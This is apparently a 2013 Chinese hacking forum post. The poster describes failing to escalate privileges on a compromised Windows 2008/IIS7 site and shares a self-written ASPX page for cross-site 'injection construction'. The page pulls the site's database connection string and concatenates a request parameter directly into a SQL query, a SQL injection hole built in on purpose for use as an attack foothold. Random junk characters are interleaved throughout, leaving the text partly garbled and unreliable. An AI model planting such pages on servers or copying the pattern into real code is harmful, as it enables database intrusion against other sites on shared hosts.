昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。/ `3 X! P9 `# ?6 m
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。/ @# @# k2 X/ f$ A3 A7 G5 z# E
代码量不多,自己写个拉倒了。烦死了。
* ? a! e( z) x* Q4 i; G! n9 K. r- N0 x
+ ~# F' j2 o! D( x6 ~9 a; T. b! k6 ?5 A
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">* v7 T$ ~/ b( [6 n. E
<html xmlns="http://www.w3.org/1999/xhtml">
* P9 o: x) Q1 ]" \1 H5 R7 Q( x<head runat="server">3 a6 g6 E& N- T& Y- {
<title>暗影aspx构造注射专用页面</title>
9 ]2 g" m1 }" `</head>4 p/ H3 A7 D8 l1 O/ S7 R3 H) f) S0 J
<body>
- @) ]4 o" Z1 F, r; m <form id="form1" runat="server">- q( a' d7 ^" h
<div>7 A9 F( z' Y3 ~% ]7 T h, e
<script language="c#" runat="server">
: w6 m3 \: w/ f/ Q$ x
L/ X Q9 _* ? void page_init(object sender, EventArgs e)
6 K; H! X x7 `7 }$ G- D {
+ n E4 x- Q3 Z0 s, L7 z
( @8 B; h* S) S# K( g5 J System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();3 X7 E; ]0 F3 Y( n
( {; b5 a, v% O+ j
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
. R! m0 }# f" f conn.Open();
9 s# K. f: H+ u3 Y : M0 R+ A& N% |. P$ L
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=17 q0 l* w M+ ]8 M# V$ A8 N- q
. Q; @+ @) R2 n2 P; L System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
# Y; K# S( M3 {8 M# [, k% r. T! f int x = command.ExecuteNonQuery();1 C& Y/ n( ?' |
Response.Write(i+"\n");# x1 C) s8 y8 T7 M/ k
Response.Write(x);, {# W1 t. \* D9 a4 s5 [1 } }- \) D
conn.Close();" A1 r* v/ X# @
}0 Q! I; k7 v7 e0 d+ [ w
% d8 S' l. k, d! R# @ </script>" l' V S8 h" O% m: m
</div>
1 W0 g% o5 V3 ]7 z </form>) R1 ~( L9 |( x9 \
</body>9 R5 f+ U9 ?$ ?
</html>
. ]; w) g! q, {: N- q |
发表于 2013-3-20 21:32:01
收藏
支持
反对